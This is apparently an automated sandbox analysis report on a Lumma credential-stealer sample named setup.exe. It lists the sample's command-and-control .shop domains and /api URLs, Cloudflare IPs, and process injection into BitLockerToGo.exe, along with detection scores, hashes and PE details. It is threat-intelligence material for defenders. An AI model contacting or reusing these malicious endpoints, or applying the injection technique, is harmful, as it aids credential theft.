Source: setup.exe, 00000000.00000002.2147235754.00000000034F2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: southedhiscuso.shop
Source: setup.exe, 00000000.00000002.2147235754.00000000034F2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: deicedosmzj.shop
Source: setup.exe, 00000000.00000002.2147235754.00000000034F2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: cagedwifedsozm.shop
Source: setup.exe, 00000000.00000002.2147235754.00000000034F2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: charecteristicdxp.shop
Source: setup.exe, 00000000.00000002.2147235754.00000000034F2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: interactiedovspm.shop
Source: setup.exe, 00000000.00000002.2147235754.00000000034F2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: potentioallykeos.shop
Source: setup.exe, 00000000.00000002.2147235754.00000000034F2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: largerryskwhq.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\setup.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: A70008	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 438000	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 43B000	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 44A000	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

Jump to behavior

Source: C:\Users\user\Desktop\setup.exe	Queries volume information: C:\Users\user\Desktop\setup.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Queries volume information: C:\Windows VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	311 Process Injection	1 Virtualization/Sandbox Evasion	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	311 Process Injection	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	2 Clipboard Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	12 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	13 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
setup.exe	71%	ReversingLabs	Win32.Spyware.Lummastealer
setup.exe	60%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
interactiedovspm.shop	21%	Virustotal	Browse
charecteristicdxp.shop	21%	Virustotal	Browse
largerryskwhq.shop	8%	Virustotal	Browse
potentioallykeos.shop	21%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://management.azure.commismatching	0%	Avira URL Cloud	safe
https://protobuf.dev/reference/go/faq#namespace-conflictmlkem768:	0%	Avira URL Cloud	safe
https://auth.docker.com/	0%	Avira URL Cloud	safe
https://github.com/golang/protobuf/issues/1609):	0%	Avira URL Cloud	safe
https://www.cloudflare.com/learning/access-management/phishing-attack/	0%	Avira URL Cloud	safe
https://potentioallykeos.shop/api	100%	Avira URL Cloud	malware
https://interactiedovspm.shop/api	100%	Avira URL Cloud	malware
https://protobuf.dev/reference/go/faq#namespace-conflictmlkem768:	0%	Virustotal		Browse
https://auth.docker.com/	0%	Virustotal		Browse
https://potentioallykeos.shop/	100%	Avira URL Cloud	malware
https://www.cloudflare.com/learning/access-management/phishing-attack/	0%	Virustotal		Browse
https://interactiedovspm.shop/	100%	Avira URL Cloud	malware
https://github.com/golang/protobuf/issues/1609):	0%	Virustotal		Browse
https://largerryskwhq.shop/api3	0%	Avira URL Cloud	safe
https://largerryskwhq.shop/api	100%	Avira URL Cloud	malware
https://potentioallykeos.shop/ql	100%	Avira URL Cloud	malware
https://potentioallykeos.shop/	20%	Virustotal		Browse
https://interactiedovspm.shop/api	23%	Virustotal		Browse
https://interactiedovspm.shop/	21%	Virustotal		Browse
https://potentioallykeos.shop/api	23%	Virustotal		Browse
https://largerryskwhq.shop/	0%	Avira URL Cloud	safe
https://www.cloudflare.com/5xx-error-landing	0%	Avira URL Cloud	safe
https://largerryskwhq.shop/api	17%	Virustotal		Browse
https://www.cloudflare.com/5xx-error-landing	0%	Virustotal		Browse
https://largerryskwhq.shop/	3%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
interactiedovspm.shop	104.21.42.119	true	true	21%, Virustotal, Browse	unknown
charecteristicdxp.shop	172.67.186.145	true	true	21%, Virustotal, Browse	unknown
largerryskwhq.shop	188.114.96.3	true	true	8%, Virustotal, Browse	unknown
potentioallykeos.shop	unknown	unknown	true	21%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://interactiedovspm.shop/api	true	23%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://largerryskwhq.shop/api	true	17%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	BitLockerToGo.exe, 00000002.00000003.2172380819.0000000002F00000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://management.azure.commismatching	setup.exe	false	Avira URL Cloud: safe	unknown
https://auth.docker.com/	setup.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/golang/protobuf/issues/1609):	setup.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://protobuf.dev/reference/go/faq#namespace-conflictmlkem768:	setup.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://potentioallykeos.shop/api	BitLockerToGo.exe, 00000002.00000003.2155014336.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2155014336.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp	false	23%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://potentioallykeos.shop/	BitLockerToGo.exe, 00000002.00000003.2155014336.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp	false	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://interactiedovspm.shop/	BitLockerToGo.exe, 00000002.00000003.2181952678.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://largerryskwhq.shop/api3	BitLockerToGo.exe, 00000002.00000003.2155014336.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://potentioallykeos.shop/ql	BitLockerToGo.exe, 00000002.00000003.2155014336.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://largerryskwhq.shop/	BitLockerToGo.exe, 00000002.00000003.2155014336.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2184777123.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2181952678.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.cloudflare.com/5xx-error-landing	BitLockerToGo.exe, 00000002.00000002.2184777123.0000000002E7E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2172380819.0000000002F00000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.186.145	charecteristicdxp.shop	United States	13335	CLOUDFLARENETUS	true
188.114.96.3	largerryskwhq.shop	European Union	13335	CLOUDFLARENETUS	true
104.21.42.119	interactiedovspm.shop	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1500379
Start date and time:	2024-08-28 11:11:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	setup.exe
Detection:	MAL
Classification:	mal100.evad.winEXE@4/0@4/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 71% Number of executed functions: 9 Number of non-executed functions: 72
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target setup.exe, PID 5328 because there are no executed function
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:12:07	API Interceptor	3x Sleep call for process: BitLockerToGo.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.186.145	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	SecuriteInfo.com.Trojan.InjectNET.17.28316.12072.exe	Get hash	malicious	LummaC	Browse
	Main.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse
	SecuriteInfo.com.Win64.Malware-gen.14072.1224.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, MicroClip	Browse
	SecuriteInfo.com.Win64.Malware-gen.11552.16589.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse
	SecuriteInfo.com.W64.Agent.VY.tr.12188.8697.exe	Get hash	malicious	LummaC, Go Injector	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, PureLog Stealer, RedLine, zgRAT	Browse
188.114.96.3	http://allegro-8888.com/	Get hash	malicious	Unknown	Browse	allegro-8888.com/xml/index.html
	PO_112234525626823775.js	Get hash	malicious	Lokibot	Browse	werdotx.shop/Devil/PWS/fre.php
	nOyswc9ly2.dll	Get hash	malicious	Unknown	Browse	web.ad87h92j.com/4/t.bmp
	pXm5oVO3Go.exe	Get hash	malicious	Nitol	Browse	web.ad87h92j.com/4/t.bmp
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/0U9QqTZ6/download
	FedEx Shipping Document.scr.exe	Get hash	malicious	Azorult	Browse	l0h5.shop/CM341/index.php
	Quote 1T PN40 082624.exe	Get hash	malicious	FormBook	Browse	www.lampgm.pro/em9t/
	weave.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	671893cm.n9shka.top/eternalpipeLowProcessDbDatalifewpPublicCdn.php
	steam_module_x64.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	671893cm.n9shka.top/eternalpipeLowProcessDbDatalifewpPublicCdn.php
	http://y8oj.tonetrau.com	Get hash	malicious	Unknown	Browse	y8oj.tonetrau.com/
104.21.42.119	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	SecuriteInfo.com.Win64.Malware-gen.14072.1224.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, MicroClip	Browse
	N#U0435wInst.exe	Get hash	malicious	LummaC	Browse
	Loader.exe	Get hash	malicious	LummaC	Browse
	FusionLoader v2.1.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	d3d9x.dll	Get hash	malicious	LummaC	Browse
	navicat161.exe	Get hash	malicious	LummaC, Go Injector	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
charecteristicdxp.shop	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.186.145
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.84.50
	SecuriteInfo.com.Trojan.InjectNET.17.28316.12072.exe	Get hash	malicious	LummaC	Browse	172.67.186.145
	Main.exe	Get hash	malicious	LummaC	Browse	172.67.186.145
	3QKcKCEzYP.exe	Get hash	malicious	LummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBC	Browse	172.67.186.145
	Setup.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.186.145
	SecuriteInfo.com.Win64.Malware-gen.14072.1224.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, MicroClip	Browse	172.67.186.145
	SecuriteInfo.com.Win64.Malware-gen.11552.16589.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.186.145
	3YnUgeDEZz.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.84.50
	SecuriteInfo.com.W64.Agent.VY.tr.12188.8697.exe	Get hash	malicious	LummaC, Go Injector	Browse	172.67.186.145
largerryskwhq.shop	Soft.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
interactiedovspm.shop	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.161.217
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.161.217
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.42.119
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.161.217
	SecuriteInfo.com.Trojan.InjectNET.17.28316.12072.exe	Get hash	malicious	LummaC	Browse	172.67.161.217
	Main.exe	Get hash	malicious	LummaC	Browse	172.67.161.217
	3QKcKCEzYP.exe	Get hash	malicious	LummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBC	Browse	172.67.161.217
	Setup.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.161.217
	SecuriteInfo.com.Win64.Malware-gen.14072.1224.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, MicroClip	Browse	104.21.42.119
	SecuriteInfo.com.Win64.Malware-gen.11552.16589.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.161.217

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Payment Details.exe	Get hash	malicious	FormBook	Browse	104.21.72.245
	https://en.aiacademy.tw	Get hash	malicious	Unknown	Browse	104.17.24.14
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://emea.dcv.ms/haHCQHi4RD	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://iv1tm.ykrbkt.ru/iV1TM/#hans.wurst@us.com	Get hash	malicious	HTMLPhisher	Browse	172.67.153.202
	https://aka.ms/LearnAboutSenderIdentification	Get hash	malicious	HTMLPhisher	Browse	104.18.36.155
	file.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	Scan000406860.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
CLOUDFLARENETUS	Payment Details.exe	Get hash	malicious	FormBook	Browse	104.21.72.245
	https://en.aiacademy.tw	Get hash	malicious	Unknown	Browse	104.17.24.14
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://emea.dcv.ms/haHCQHi4RD	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://iv1tm.ykrbkt.ru/iV1TM/#hans.wurst@us.com	Get hash	malicious	HTMLPhisher	Browse	172.67.153.202
	https://aka.ms/LearnAboutSenderIdentification	Get hash	malicious	HTMLPhisher	Browse	104.18.36.155
	file.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	Scan000406860.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
CLOUDFLARENETUS	Payment Details.exe	Get hash	malicious	FormBook	Browse	104.21.72.245
	https://en.aiacademy.tw	Get hash	malicious	Unknown	Browse	104.17.24.14
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://emea.dcv.ms/haHCQHi4RD	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://iv1tm.ykrbkt.ru/iV1TM/#hans.wurst@us.com	Get hash	malicious	HTMLPhisher	Browse	172.67.153.202
	https://aka.ms/LearnAboutSenderIdentification	Get hash	malicious	HTMLPhisher	Browse	104.18.36.155
	file.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	Scan000406860.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	UploadCustomersTemplate(2).xlsm	Get hash	malicious	Unknown	Browse	172.67.186.145 104.21.42.119 188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	172.67.186.145 104.21.42.119 188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	172.67.186.145 104.21.42.119 188.114.96.3
	bViL3vNljZ.exe	Get hash	malicious	Unknown	Browse	172.67.186.145 104.21.42.119 188.114.96.3
	bViL3vNljZ.exe	Get hash	malicious	Unknown	Browse	172.67.186.145 104.21.42.119 188.114.96.3
	run.exe	Get hash	malicious	Crypto Miner	Browse	172.67.186.145 104.21.42.119 188.114.96.3
	Apponde2.exe	Get hash	malicious	AveMaria, UACMe, XRed	Browse	172.67.186.145 104.21.42.119 188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	172.67.186.145 104.21.42.119 188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.186.145 104.21.42.119 188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.186.145 104.21.42.119 188.114.96.3

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.72977146868106
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	setup.exe
File size:	11'890'176 bytes
MD5:	f7ad8585ed9a9b46b3a98a64a7780dc6
SHA1:	0974f543632bbb15787590bba20a2259a02f6a4f
SHA256:	44599cd8d329c27e18e5600cf2ce0dc1a8ebe8be976337eea0070be0995fa40c
SHA512:	27099ee87d23ef0813c8727dce197a16ee58a6b670deee402cabf5b782607f4406d56b26b62a36ce4a24b4a8ff76b9127d3c7c84b097875ce291ab28b2729503
SSDEEP:	98304:JeBSce1n5NQXme4wPL9jIGkh8dJkkU71B:CUl4u71
TLSH:	DAC64B90FAC719F6D8435479849F626F17349D0ACB39C787EA447E69E8372D22C33289
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........L...............`J..........6.......`....@..........................`......]g....@................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Static PE Info

General

Entrypoint:	0x4736a0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	1aae8bf580c846f39c71c05898e57e88

Entrypoint Preview

Instruction
jmp 00007FBAE8810700h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
sub esp, 28h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+10h], ebp
mov dword ptr [esp+14h], esi
mov dword ptr [esp+18h], edi
mov dword ptr [esp], eax
mov dword ptr [esp+04h], ecx
call 00007FBAE87EBE96h
mov eax, dword ptr [esp+08h]
mov edi, dword ptr [esp+18h]
mov esi, dword ptr [esp+14h]
mov ebp, dword ptr [esp+10h]
mov ebx, dword ptr [esp+1Ch]
add esp, 28h
retn 0004h
ret
int3
int3
int3
int3
int3
int3
sub esp, 08h
mov ecx, dword ptr [esp+0Ch]
mov edx, dword ptr [ecx]
mov eax, esp
mov dword ptr [edx+04h], eax
sub eax, 00010000h
mov dword ptr [edx], eax
add eax, 00000BA0h
mov dword ptr [edx+08h], eax
mov dword ptr [edx+0Ch], eax
lea edi, dword ptr [ecx+34h]
mov dword ptr [edx+18h], ecx
mov dword ptr [edi], edx
mov dword ptr [esp+04h], edi
call 00007FBAE8812B54h
cld
call 00007FBAE8811BEEh
call 00007FBAE8810829h
add esp, 08h
ret
jmp 00007FBAE8812A00h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ebx, dword ptr [esp+04h]
mov ebp, esp
mov dword ptr fs:[00000034h], 00000000h
mov ecx, dword ptr [ebx+04h]
cmp ecx, 00000000h
je 00007FBAE8812A01h
mov eax, ecx
shl eax, 02h
sub esp, eax
mov edi, esp
mov esi, dword ptr [ebx+08h]
cld
rep movsd

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb3a000	0x44c	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb84000	0x1f54	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb3b000	0x47148	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa97d80	0xb4	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4a5e18	0x4a6000	140980552a806bffd33b98e3899bef19	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x4a7000	0x5eec50	0x5eee00	31c5132c811e893a5e83dfe08d6bbd33	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa96000	0xa3c00	0x78200	d68868f148252df99abc14584972dff5	False	0.31561158623829344	data	5.25774309279457	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xb3a000	0x44c	0x600	3b9968dec82db01411092c94cf3c4673	False	0.3600260416666667	OpenPGP Public Key	3.8776437007407005	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0xb3b000	0x47148	0x47200	e24dc6867f1f5c364b4f0a7d3dd35ba5	False	0.5635366322495606	data	6.658217096434182	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab	0xb83000	0x4	0x200	07b5472d347d42780469fb2654b7fc54	False	0.02734375	data	0.020393135236084953	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0xb84000	0x1f54	0x2000	37551328525acf6c7ae6cf25887c8ed5	False	0.3292236328125	data	4.656854020393421	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xb841d4	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.5675675675675675
RT_ICON	0xb842fc	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States	0.4486994219653179
RT_ICON	0xb84864	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.4637096774193548
RT_ICON	0xb84b4c	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States	0.3935018050541516
RT_GROUP_ICON	0xb853f4	0x3e	data	English	United States	0.8387096774193549
RT_VERSION	0xb85434	0x4f4	data	English	United States	0.26261829652996843
RT_MANIFEST	0xb85928	0x62c	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.4240506329113924

Imports

DLL

Import

kernel32.dll

WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
